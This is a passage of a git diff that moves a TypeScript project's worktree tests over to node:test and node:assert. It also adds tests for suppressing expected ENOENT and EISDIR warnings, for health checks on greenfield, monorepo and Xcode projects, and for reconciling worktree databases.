   const r2 = getRequirementById('R002');
-  assertTrue(r2 !== null, 'R002 from worktree now in main');
-  assertEq(r2?.description, 'Must be fast', 'R002 data correct after merge');
+  assert.ok(r2 !== null, 'R002 from worktree now in main');
+  assert.deepStrictEqual(r2?.description, 'Must be fast', 'R002 data correct after merge');
 
   cleanup(mainDir, wtDir);
 }
@@ -264,11 +264,11 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   openDatabase(mainDb);
   const result = reconcileWorktreeDb(mainDb, wtDb);
 
-  assertTrue(result.artifacts > 0, 'artifacts merged count > 0');
+  assert.ok(result.artifacts > 0, 'artifacts merged count > 0');
   const adapter = _getAdapter()!;
   const row = adapter.prepare('SELECT * FROM artifacts WHERE path = ?').get('docs/api.md');
-  assertTrue(row !== null, 'artifact from worktree now in main');
-  assertEq(row?.['artifact_type'], 'reference', 'artifact data correct after merge');
+  assert.ok(row !== null, 'artifact from worktree now in main');
+  assert.deepStrictEqual(row?.['artifact_type'], 'reference', 'artifact data correct after merge');
 
   cleanup(mainDir, wtDir);
 }
@@ -305,15 +305,15 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   openDatabase(mainDb);
   const result = reconcileWorktreeDb(mainDb, wtDb);
 
-  assertTrue(result.conflicts.length > 0, 'conflicts detected');
-  assertTrue(
+  assert.ok(result.conflicts.length > 0, 'conflicts detected');
+  assert.ok(
     result.conflicts.some(c => c.includes('D001')),
     'conflict mentions D001',
   );
 
   // Worktree-wins: D001 should now have worktree's value
   const d1 = getDecisionById('D001');
-  assertEq(d1?.choice, 'sql.js', 'worktree wins on conflict (INSERT OR REPLACE)');
+  assert.deepStrictEqual(d1?.choice, 'sql.js', 'worktree wins on conflict (INSERT OR REPLACE)');
 
   cleanup(mainDir, wtDir);
 }
@@ -326,10 +326,10 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   seedMainDb(mainDb);
 
   const result = reconcileWorktreeDb(mainDb, '/nonexistent/worktree.db');
-  assertEq(result.decisions, 0, 'no decisions merged for missing worktree DB');
-  assertEq(result.requirements, 0, 'no requirements merged for missing worktree DB');
-  assertEq(result.artifacts, 0, 'no artifacts merged for missing worktree DB');
-  assertEq(result.conflicts.length, 0, 'no conflicts for missing worktree DB');
+  assert.deepStrictEqual(result.decisions, 0, 'no decisions merged for missing worktree DB');
+  assert.deepStrictEqual(result.requirements, 0, 'no requirements merged for missing worktree DB');
+  assert.deepStrictEqual(result.artifacts, 0, 'no artifacts merged for missing worktree DB');
+  assert.deepStrictEqual(result.conflicts.length, 0, 'no conflicts for missing worktree DB');
 
   cleanup(mainDir);
 }
@@ -366,9 +366,9 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
 
   openDatabase(mainDb);
   const result = reconcileWorktreeDb(mainDb, wtDb);
-  assertTrue(result.decisions > 0, 'reconciliation works with spaces in path');
+  assert.ok(result.decisions > 0, 'reconciliation works with spaces in path');
   const d3 = getDecisionById('D003');
-  assertTrue(d3 !== null, 'D003 merged from worktree with spaces in path');
+  assert.ok(d3 !== null, 'D003 merged from worktree with spaces in path');
 
   cleanup(baseDir);
 }
@@ -388,7 +388,7 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   reconcileWorktreeDb(mainDb, wtDb);
 
   // Verify main DB is still fully usable after DETACH
-  assertTrue(isDbAvailable(), 'DB still available after reconciliation');
+  assert.ok(isDbAvailable(), 'DB still available after reconciliation');
 
   insertDecision({
     id: 'D099',
@@ -403,8 +403,8 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   });
 
   const d99 = getDecisionById('D099');
-  assertTrue(d99 !== null, 'can insert and query after reconciliation');
-  assertEq(d99?.choice, 'works', 'post-reconcile data correct');
+  assert.ok(d99 !== null, 'can insert and query after reconciliation');
+  assert.deepStrictEqual(d99?.choice, 'works', 'post-reconcile data correct');
 
   // Verify no "wt" database still attached
   const adapter = _getAdapter()!;
@@ -415,7 +415,7 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   } catch {
     // Expected — wt should be detached
   }
-  assertTrue(!wtAccessible, 'wt database is detached after reconciliation');
+  assert.ok(!wtAccessible, 'wt database is detached after reconciliation');
 
   cleanup(mainDir, wtDir);
 }
@@ -436,11 +436,10 @@ console.log('\n=== worktree-db: reconcileWorktreeDb ===');
   const result = reconcileWorktreeDb(mainDb, wtDb);
 
   // Should still report counts for the existing rows (INSERT OR REPLACE touches them)
-  assertTrue(result.conflicts.length === 0, 'no conflicts when DBs are identical');
-  assertTrue(isDbAvailable(), 'DB usable after no-change reconciliation');
+  assert.ok(result.conflicts.length === 0, 'no conflicts when DBs are identical');
+  assert.ok(isDbAvailable(), 'DB usable after no-change reconciliation');
 
   cleanup(mainDir, wtDir);
 }
 
 // ─── Final Report ──────────────────────────────────────────────────────────
-report();
diff --git a/src/resources/extensions/gsd/tests/worktree-expected-warnings.test.ts b/src/resources/extensions/gsd/tests/worktree-expected-warnings.test.ts
new file mode 100644
index 000000000..60c2dc064
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-expected-warnings.test.ts
@@ -0,0 +1,38 @@
+/**
+ * worktree-expected-warnings.test.ts — #3665
+ *
+ * Verify that auto-worktree.ts and worktree-manager.ts suppress expected
+ * ENOENT and EISDIR conditions instead of logging misleading warnings.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const autoWorktreeFile = join(__dirname, "..", "auto-worktree.ts");
+const worktreeManagerFile = join(__dirname, "..", "worktree-manager.ts");
+
+describe("worktree expected-condition warning suppression (#3665)", () => {
+  const autoSource = readFileSync(autoWorktreeFile, "utf-8");
+
+  test("auto-worktree.ts checks for ENOENT before logging unlink warning", () => {
+    assert.match(autoSource, /code\s*!==\s*["']ENOENT["']/);
+  });
+
+  test("auto-worktree.ts checks for EISDIR before logging unlink warning", () => {
+    assert.match(autoSource, /code\s*!==\s*["']EISDIR["']/);
+  });
+
+  test("auto-worktree.ts references issue #3597", () => {
+    assert.match(autoSource, /#3597/);
+  });
+
+  const managerSource = readFileSync(worktreeManagerFile, "utf-8");
+
+  test("worktree-manager.ts checks isDirectory() before reading .git file", () => {
+    assert.match(managerSource, /lstatSync\(gitPath\)\.isDirectory\(\)/);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-health-dispatch.test.ts b/src/resources/extensions/gsd/tests/worktree-health-dispatch.test.ts
index cd5d72f46..fc8e828e1 100644
--- a/src/resources/extensions/gsd/tests/worktree-health-dispatch.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-health-dispatch.test.ts
@@ -7,9 +7,9 @@
  * rather than hard-coding package.json / src/ only.
  */
 
-import test from "node:test";
+import { describe, test, beforeEach, afterEach } from "node:test";
 import assert from "node:assert/strict";
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, readdirSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
 import { execSync } from "node:child_process";
@@ -36,28 +36,41 @@ function createGitRepo(): string {
  * Returns true when the directory would PASS the health check (dispatch
  * proceeds), false when it would FAIL (dispatch blocked).
  *
- * This mirrors the fixed logic: .git must exist, AND at least one
- * PROJECT_FILES entry or a src/ directory must exist.
+ * The only hard gate is .git — project files are advisory (greenfield
+ * projects won't have them yet). Returns { pass, greenfield } to
+ * distinguish "pass with project files" from "pass as greenfield".
  */
 function wouldPassHealthCheck(basePath: string, existsSyncFn: (p: string) => boolean): boolean {
   const hasGit = existsSyncFn(join(basePath, ".git"));
   if (!hasGit) return false;
 
+  // .git is sufficient — greenfield projects proceed with a warning
+  return true;
+}
+
+/** Whether the directory has recognized project files (used for greenfield detection). */
+function hasRecognizedProjectFiles(basePath: string, existsSyncFn: (p: string) => boolean): boolean {
   for (const file of PROJECT_FILES) {
     if (existsSyncFn(join(basePath, file))) return true;
   }
   if (existsSyncFn(join(basePath, "src"))) return true;
-
   return false;
 }
 
+/** Simulate the phases.ts Xcode-bundle detection (readdirSync suffix scan). */
+function hasXcodeBundle(basePath: string): boolean {
+  try {
+    return readdirSync(basePath).some((e) => e.endsWith(".xcodeproj") || e.endsWith(".xcworkspace"));
+  } catch { return false; }
+}
+
 import { existsSync } from "node:fs";
 
 // ─── Tests ───────────────────────────────────────────────────────────────────
 
 test("PROJECT_FILES is exported and contains expected multi-ecosystem entries", () => {
   assert.ok(Array.isArray(PROJECT_FILES), "PROJECT_FILES is an array");
-  assert.ok(PROJECT_FILES.length >= 17, `expected >= 17 entries, got ${PROJECT_FILES.length}`);
+  assert.ok(PROJECT_FILES.length >= 18, `expected >= 18 entries, got ${PROJECT_FILES.length}`);
   // Spot-check key ecosystems
   assert.ok(PROJECT_FILES.includes("Cargo.toml"), "includes Rust marker");
   assert.ok(PROJECT_FILES.includes("go.mod"), "includes Go marker");
@@ -67,112 +80,96 @@ test("PROJECT_FILES is exported and contains expected multi-ecosystem entries",
   assert.ok(PROJECT_FILES.includes("Package.swift"), "includes Swift marker");
 });
 
-test("health check passes for Rust project (Cargo.toml, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+describe("health check with git repo", () => {
+  let dir: string;
+  beforeEach(() => { dir = createGitRepo(); });
+  afterEach(() => { rmSync(dir, { recursive: true, force: true }); });
+
+  test("health check passes for Rust project (Cargo.toml, no package.json)", () => {
     writeFileSync(join(dir, "Cargo.toml"), "[package]\nname = \"test\"\n");
     mkdirSync(join(dir, "crates"), { recursive: true });
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Rust project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for Go project (go.mod, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for Go project (go.mod, no package.json)", () => {
     writeFileSync(join(dir, "go.mod"), "module example.com/test\n\ngo 1.21\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Go project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for Python project (pyproject.toml, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for Python project (pyproject.toml, no package.json)", () => {
     writeFileSync(join(dir, "pyproject.toml"), "[project]\nname = \"test\"\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Python project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for Java project (pom.xml, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for Java project (pom.xml, no package.json)", () => {
     writeFileSync(join(dir, "pom.xml"), "<project></project>\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Java project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for Swift project (Package.swift, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for Swift project (Package.swift, no package.json)", () => {
     writeFileSync(join(dir, "Package.swift"), "// swift-tools-version:5.7\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Swift project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for C/C++ project (CMakeLists.txt, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for C/C++ project (CMakeLists.txt, no package.json)", () => {
     writeFileSync(join(dir, "CMakeLists.txt"), "cmake_minimum_required(VERSION 3.20)\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "C/C++ project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for Elixir project (mix.exs, no package.json)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for Elixir project (mix.exs, no package.json)", () => {
     writeFileSync(join(dir, "mix.exs"), "defmodule Test.MixProject do\nend\n");
     assert.ok(wouldPassHealthCheck(dir, existsSync), "Elixir project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for JS project (package.json, backward compat)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for JS project (package.json, backward compat)", () => {
     writeFileSync(join(dir, "package.json"), '{"name":"test"}\n');
     assert.ok(wouldPassHealthCheck(dir, existsSync), "JS project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
-});
+  });
 
-test("health check passes for src/-only project (backward compat)", () => {
-  const dir = createGitRepo();
-  try {
+  test("health check passes for src/-only project (backward compat)", () => {
     mkdirSync(join(dir, "src"), { recursive: true });
     assert.ok(wouldPassHealthCheck(dir, existsSync), "src/-only project should pass health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+  });
+
+  test("health check passes for empty git repo (greenfield project)", () => {
+    assert.ok(wouldPassHealthCheck(dir, existsSync), "empty git repo should pass health check (greenfield)");
+    assert.ok(!hasRecognizedProjectFiles(dir, existsSync), "empty git repo has no recognized project files");
+  });
 });
 
-test("health check fails for directory with no .git", () => {
-  const dir = mkdtempSync(join(tmpdir(), "wt-dispatch-test-nogit-"));
-  try {
+describe("health check without git repo", () => {
+  let dir: string;
+  beforeEach(() => { dir = mkdtempSync(join(tmpdir(), "wt-dispatch-test-nogit-")); });
+  afterEach(() => { rmSync(dir, { recursive: true, force: true }); });
+
+  test("health check fails for directory with no .git", () => {
     writeFileSync(join(dir, "Cargo.toml"), "[package]\nname = \"test\"\n");
     assert.ok(!wouldPassHealthCheck(dir, existsSync), "no-git directory should fail health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+  });
 });
 
-test("health check fails for empty git repo with no project files", () => {
-  const dir = createGitRepo();
-  try {
-    assert.ok(!wouldPassHealthCheck(dir, existsSync), "empty git repo should fail health check");
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+describe("health check with xcodegen and Xcode bundles", () => {
+  let dir: string;
+  beforeEach(() => { dir = createGitRepo(); });
+  afterEach(() => { rmSync(dir, { recursive: true, force: true }); });
+
+  test("health check passes for xcodegen project (project.yml, no Package.swift)", () => {
+    writeFileSync(join(dir, "project.yml"), "name: MyApp\ntargets:\n  MyApp:\n    type: application\n");
+    assert.ok(wouldPassHealthCheck(dir, existsSync), "xcodegen project should pass health check");
+  });
+
+  // Regression for the real-world failure in #1882: an iOS project with a
+  // project-specific Xcode bundle (Sudokuxyz.xcodeproj/) was blocked because
+  // PROJECT_FILES only probes exact filenames, not suffix-based directory names.
+  test("Xcode bundle (*.xcodeproj) is not in PROJECT_FILES but detected by suffix scan", () => {
+    mkdirSync(join(dir, "Sudokuxyz.xcodeproj"), { recursive: true });
+    mkdirSync(join(dir, "Sources", "Sudokuxyz"), { recursive: true });
+    writeFileSync(join(dir, "Sources", "Sudokuxyz", "ContentView.swift"), "import SwiftUI\n");
+    // PROJECT_FILES uses exact names — cannot match project-specific bundle names
+    assert.ok(!hasRecognizedProjectFiles(dir, existsSync), "xcodeproj bundle must NOT be in PROJECT_FILES");
+    // The readdirSync suffix scan used in phases.ts detects it
+    assert.ok(hasXcodeBundle(dir), "readdirSync suffix scan detects .xcodeproj bundle");
+    // Health check passes regardless (only requires .git)
+    assert.ok(wouldPassHealthCheck(dir, existsSync), "Xcode bundle project should pass health check");
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/worktree-health-monorepo.test.ts b/src/resources/extensions/gsd/tests/worktree-health-monorepo.test.ts
new file mode 100644
index 000000000..12a9f6f1f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/worktree-health-monorepo.test.ts
@@ -0,0 +1,73 @@
+/**
+ * worktree-health-monorepo.test.ts — #2347
+ *
+ * The worktree health check in auto/phases.ts falsely rejects monorepos
+ * where package.json (or other project markers) is in a parent directory.
+ * This test verifies that the health check walks parent directories.
+ */
+
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const srcPath = join(import.meta.dirname, "..", "auto", "phases.ts");
+const src = readFileSync(srcPath, "utf-8");
+
+console.log("\n=== #2347: Worktree health check supports monorepos ===");
+
+// ── Test 1: The health check region exists ──────────────────────────────
+
+const healthCheckIdx = src.indexOf("Worktree health check");
+assertTrue(healthCheckIdx > 0, "auto/phases.ts has worktree health check section");
+
+const healthCheckRegion = src.slice(healthCheckIdx, healthCheckIdx + 2000);
+
+// ── Test 2: The check walks parent directories for project markers ──────
+
+// The fix should check parent directories for project files, not just s.basePath.
+// Look for patterns like: walking up directories, dirname, parent, or a helper
+// function that checks ancestors.
+const checksParentDirs =
+  healthCheckRegion.includes("dirname") ||
+  healthCheckRegion.includes("parent") ||
+  healthCheckRegion.includes("ancestor") ||
+  healthCheckRegion.includes("walk") ||
+  // Or a helper function that's called with the base path
+  /hasProjectFileInAncestor|findProjectRoot|checkParent/i.test(healthCheckRegion);
+
+assertTrue(
+  checksParentDirs,
+  "Health check should walk parent directories for project markers (monorepo support) (#2347)",
+);
+
+// ── Test 3: The parent walk stops at a .git boundary ──────────────────
+
+// The parent directory walk must not escape the git repository root.
+// Without this guard, ancestor directories like ~ or /usr/local that
+// happen to contain package.json would cause false positive health checks.
+const hasGitBoundary = healthCheckRegion.includes('.git') &&
+  (healthCheckRegion.includes('break') || healthCheckRegion.includes('stop'));
+
+assertTrue(
+  hasGitBoundary,
+  "Parent directory walk must stop at .git repository boundary to prevent false positives",
+);
+
+// ── Test 4: The greenfield warning should only trigger when no parent has markers ─
+
+// The original code was:
+//   const hasProjectFile = PROJECT_FILES.some((f) => deps.existsSync(join(s.basePath, f)));
+// The fix should check parents too, so the greenfield warning only fires
+// when NO ancestor directory has project markers either.
+const hasParentCheck = healthCheckRegion.includes("parent") ||
+  healthCheckRegion.includes("dirname") ||
+  /ancestor|walk.*up/i.test(healthCheckRegion);
+
+assertTrue(
+  hasParentCheck,
+  "Greenfield check should consider parent directories before warning (#2347)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/worktree-health.test.ts b/src/resources/extensions/gsd/tests/worktree-health.test.ts
index e6580ecd9..425e63f02 100644
--- a/src/resources/extensions/gsd/tests/worktree-health.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-health.test.ts
@@ -12,9 +12,9 @@ import { execSync } from "node:child_process";
 
 import { getWorktreeHealth, formatWorktreeStatusLine } from "../worktree-health.ts";
 import { listWorktrees } from "../worktree-manager.ts";
-import { createTestContext } from "./test-helpers.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 function run(cmd: string, cwd: string): string {
   return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
@@ -32,11 +32,10 @@ function createBaseRepo(): string {
   return dir;
 }
 
-async function main(): Promise<void> {
+describe('worktree-health', async () => {
   // Skip all tests on Windows — git worktree path resolution issues
   if (process.platform === "win32") {
     console.log("(all worktree-health tests skipped on Windows)");
-    report();
     return;
   }
 
@@ -59,16 +58,16 @@ async function main(): Promise<void> {
 
       const worktrees = listWorktrees(dir);
       const wt = worktrees.find(w => w.name === "done-feature");
-      assertTrue(!!wt, "worktree found");
+      assert.ok(!!wt, "worktree found");
 
       const health = getWorktreeHealth(dir, wt!);
-      assertTrue(health.mergedIntoMain, "branch detected as merged");
-      assertTrue(!health.dirty, "not dirty");
-      assertTrue(health.safeToRemove, "safe to remove");
+      assert.ok(health.mergedIntoMain, "branch detected as merged");
+      assert.ok(!health.dirty, "not dirty");
+      assert.ok(health.safeToRemove, "safe to remove");
 
       const line = formatWorktreeStatusLine(health);
-      assertTrue(line.includes("merged"), "status line mentions merged");
-      assertTrue(line.includes("safe to remove"), "status line mentions safe to remove");
+      assert.ok(line.includes("merged"), "status line mentions merged");
+      assert.ok(line.includes("safe to remove"), "status line mentions safe to remove");
     }
 
     // ─── Test: unmerged worktree with dirty files ──────────────────────
@@ -89,13 +88,13 @@ async function main(): Promise<void> {
 
       const worktrees = listWorktrees(dir);
       const wt = worktrees.find(w => w.name === "dirty-wip");
-      assertTrue(!!wt, "worktree found");
+      assert.ok(!!wt, "worktree found");
 
       const health = getWorktreeHealth(dir, wt!);
-      assertTrue(!health.mergedIntoMain, "not merged");
-      assertTrue(health.dirty, "dirty detected");
-      assertTrue(health.dirtyFileCount > 0, "dirty file count > 0");
-      assertTrue(!health.safeToRemove, "not safe to remove");
+      assert.ok(!health.mergedIntoMain, "not merged");
+      assert.ok(health.dirty, "dirty detected");
+      assert.ok(health.dirtyFileCount > 0, "dirty file count > 0");
+      assert.ok(!health.safeToRemove, "not safe to remove");
     }
 
     // ─── Test: unmerged worktree with unpushed commits ─────────────────
@@ -113,12 +112,12 @@ async function main(): Promise<void> {
 
       const worktrees = listWorktrees(dir);
       const wt = worktrees.find(w => w.name === "unpushed");
-      assertTrue(!!wt, "worktree found");
+      assert.ok(!!wt, "worktree found");
 
       const health = getWorktreeHealth(dir, wt!);
-      assertTrue(!health.mergedIntoMain, "not merged");
-      assertTrue(health.unpushedCommits > 0, "unpushed commits detected");
-      assertTrue(!health.safeToRemove, "not safe to remove");
+      assert.ok(!health.mergedIntoMain, "not merged");
+      assert.ok(health.unpushedCommits > 0, "unpushed commits detected");
+      assert.ok(!health.safeToRemove, "not safe to remove");
     }
 
     // ─── Test: stale detection with short threshold ────────────────────
@@ -137,17 +136,17 @@ async function main(): Promise<void> {
 
       const worktrees = listWorktrees(dir);
       const wt = worktrees.find(w => w.name === "stale-test");
-      assertTrue(!!wt, "worktree found");
+      assert.ok(!!wt, "worktree found");
 
       // With staleDays=0, any worktree should be stale (commit was just now, but threshold is 0)
       // Actually, a just-created worktree has lastCommitAgeDays ~0 which is >= 0
       const health = getWorktreeHealth(dir, wt!, 0);
-      assertTrue(health.stale, "stale with 0-day threshold");
-      assertTrue(health.lastCommitAgeDays >= 0, "last commit age is non-negative");
+      assert.ok(health.stale, "stale with 0-day threshold");
+      assert.ok(health.lastCommitAgeDays >= 0, "last commit age is non-negative");
 
       // With staleDays=9999, should NOT be stale
       const healthNotStale = getWorktreeHealth(dir, wt!, 9999);
-      assertTrue(!healthNotStale.stale, "not stale with high threshold");
+      assert.ok(!healthNotStale.stale, "not stale with high threshold");
     }
 
     // ─── Test: formatWorktreeStatusLine for clean active worktree ──────
@@ -166,12 +165,12 @@ async function main(): Promise<void> {
 
       const worktrees = listWorktrees(dir);
       const wt = worktrees.find(w => w.name === "clean-active");
-      assertTrue(!!wt, "worktree found");
+      assert.ok(!!wt, "worktree found");
 
       const health = getWorktreeHealth(dir, wt!, 9999); // high threshold so not stale
       const line = formatWorktreeStatusLine(health);
       // Should show last commit age since it's not merged and not stale
-      assertTrue(line.includes("last commit"), "shows last commit age for active worktree");
+      assert.ok(line.includes("last commit"), "shows last commit age for active worktree");
     }
 
   } finally {
@@ -179,8 +178,4 @@ async function main(): Promise<void> {
       try { rmSync(dir, { recursive: true, force: true }); } catch { /* ignore */ }
     }
   }
-
-  report();
-}
-
-main();
+});
diff --git a/src/resources/extensions/gsd/tests/worktree-integration.test.ts b/src/resources/extensions/gsd/tests/worktree-integration.test.ts
index 5d153eec1..ab0030872 100644
--- a/src/resources/extensions/gsd/tests/worktree-integration.test.ts
+++ b/src/resources/extensions/gsd/tests/worktree-integration.test.ts
@@ -26,12 +26,14 @@ import {
   getSliceBranchName,
   autoCommitCurrentBranch,
   SLICE_BRANCH_RE,
+  _resetServiceCache,
 } from "../worktree.ts";
 
 import { deriveState } from "../state.ts";
-import { createTestContext } from './test-helpers.ts';
+import { _clearGsdRootCache } from "../paths.ts";
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 function run(command: string, cwd: string): string {
   return execSync(command, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
 }
@@ -73,42 +75,50 @@ writeFileSync(
 run("git add .", base);
 run('git commit -m "chore: init"', base);
 
-async function main(): Promise<void> {
+describe('worktree-integration', async () => {
+  // Isolate from user's global preferences (which may have git.main_branch set).
+  // Reset caches so getService() creates a fresh instance with empty preferences.
+  const originalHome = process.env.HOME;
+  const fakeHome = mkdtempSync(join(tmpdir(), "gsd-fake-home-"));
+  process.env.HOME = fakeHome;
+  _clearGsdRootCache();
+  _resetServiceCache();
+
   // ── Verify main tree baseline ──────────────────────────────────────────────
 
   console.log("\n=== Main tree baseline ===");
-  assertEq(getMainBranch(base), "main", "main tree getMainBranch returns main");
-  assertEq(detectWorktreeName(base), null, "main tree not detected as worktree");
+  assert.deepStrictEqual(getMainBranch(base), "main", "main tree getMainBranch returns main");
+  assert.deepStrictEqual(detectWorktreeName(base), null, "main tree not detected as worktree");
 
   // ── Create worktree and verify detection ───────────────────────────────────
 
   console.log("\n=== Create worktree ===");
   const wt = createWorktree(base, "alpha");
-  assertTrue(existsSync(wt.path), "worktree created on disk");
-  assertEq(wt.branch, "worktree/alpha", "worktree branch name");
+  assert.ok(existsSync(wt.path), "worktree created on disk");
+  assert.deepStrictEqual(wt.branch, "worktree/alpha", "worktree branch name");
 
   console.log("\n=== Worktree detection ===");
-  assertEq(detectWorktreeName(wt.path), "alpha", "detectWorktreeName inside worktree");
-  assertEq(getMainBranch(wt.path), "worktree/alpha", "getMainBranch returns worktree branch inside worktree");
+  assert.deepStrictEqual(detectWorktreeName(wt.path), "alpha", "detectWorktreeName inside worktree");
+  assert.deepStrictEqual(getMainBranch(wt.path), "worktree/alpha", "getMainBranch returns worktree branch inside worktree");
 
   // ── Verify current branch inside worktree ──────────────────────────────────
 
   console.log("\n=== Worktree initial branch ===");
-  assertEq(getCurrentBranch(wt.path), "worktree/alpha", "worktree starts on its own branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "worktree/alpha", "worktree starts on its own branch");
 
   // ── Verify branch name helper ──────────────────────────────────────────────
 
   console.log("\n=== getSliceBranchName with worktree ===");
-  assertEq(getSliceBranchName("M001", "S01", "alpha"), "gsd/alpha/M001/S01", "explicit worktree param");
-  assertEq(getSliceBranchName("M001", "S01"), "gsd/M001/S01", "no worktree param = plain branch");
+  assert.deepStrictEqual(getSliceBranchName("M001", "S01", "alpha"), "gsd/alpha/M001/S01", "explicit worktree param");
+  assert.deepStrictEqual(getSliceBranchName("M001", "S01"), "gsd/M001/S01", "no worktree param = plain branch");
 
   // ── Slice branch creation and detection inside worktree ────────────────────
 
   console.log("\n=== Slice branch in worktree ===");
   const sliceBranch = getSliceBranchName("M001", "S01", "alpha");
   run(`git checkout -b ${sliceBranch}`, wt.path);
-  assertEq(getCurrentBranch(wt.path), "gsd/alpha/M001/S01", "worktree-namespaced slice branch");
-  assertTrue(SLICE_BRANCH_RE.test(getCurrentBranch(wt.path)), "slice branch regex matches namespaced branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "gsd/alpha/M001/S01", "worktree-namespaced slice branch");
+  assert.ok(SLICE_BRANCH_RE.test(getCurrentBranch(wt.path)), "slice branch regex matches namespaced branch");
 
   // ── Do work on slice branch, then merge to worktree branch ─────────────────
 
@@ -119,23 +129,23 @@ async function main(): Promise<void> {
 
   // Checkout worktree base branch and merge slice branch
   run("git checkout worktree/alpha", wt.path);
-  assertEq(getCurrentBranch(wt.path), "worktree/alpha", "back on worktree branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "worktree/alpha", "back on worktree branch");
 
   run(`git merge --no-ff ${sliceBranch} -m "feat(M001/S01): First"`, wt.path);
   run(`git branch -d ${sliceBranch}`, wt.path);
-  assertEq(getCurrentBranch(wt.path), "worktree/alpha", "still on worktree branch after merge");
-  assertTrue(readFileSync(join(wt.path, "feature.txt"), "utf-8").includes("new feature"), "merge brought feature to worktree branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "worktree/alpha", "still on worktree branch after merge");
+  assert.ok(readFileSync(join(wt.path, "feature.txt"), "utf-8").includes("new feature"), "merge brought feature to worktree branch");
 
   // Verify slice branch is gone
   const branches = run("git branch", base);
-  assertTrue(!branches.includes("gsd/alpha/M001/S01"), "slice branch cleaned up");
+  assert.ok(!branches.includes("gsd/alpha/M001/S01"), "slice branch cleaned up");
 
   // ── Second slice in same worktree ──────────────────────────────────────────
 
   console.log("\n=== Second slice in worktree ===");
   const sliceBranch2 = getSliceBranchName("M001", "S02", "alpha");
   run(`git checkout -b ${sliceBranch2}`, wt.path);
-  assertEq(getCurrentBranch(wt.path), "gsd/alpha/M001/S02", "on S02 namespaced branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "gsd/alpha/M001/S02", "on S02 namespaced branch");
 
   writeFileSync(join(wt.path, "feature2.txt"), "second feature\n", "utf-8");
   run("git add .", wt.path);
@@ -144,28 +154,28 @@ async function main(): Promise<void> {
   run("git checkout worktree/alpha", wt.path);
   run(`git merge --no-ff ${sliceBranch2} -m "feat(M001/S02): Second"`, wt.path);
   run(`git branch -d ${sliceBranch2}`, wt.path);
-  assertEq(getCurrentBranch(wt.path), "worktree/alpha", "back on worktree branch");
+  assert.deepStrictEqual(getCurrentBranch(wt.path), "worktree/alpha", "back on worktree branch");
 
   // ── Parallel worktrees don't conflict ──────────────────────────────────────
 
   console.log("\n=== Parallel worktrees ===");
   const wt2 = createWorktree(base, "beta");
-  assertEq(getMainBranch(wt2.path), "worktree/beta", "second worktree has its own base branch");
+  assert.deepStrictEqual(getMainBranch(wt2.path), "worktree/beta", "second worktree has its own base branch");
 
   // Both worktrees can create S01 branches without conflict
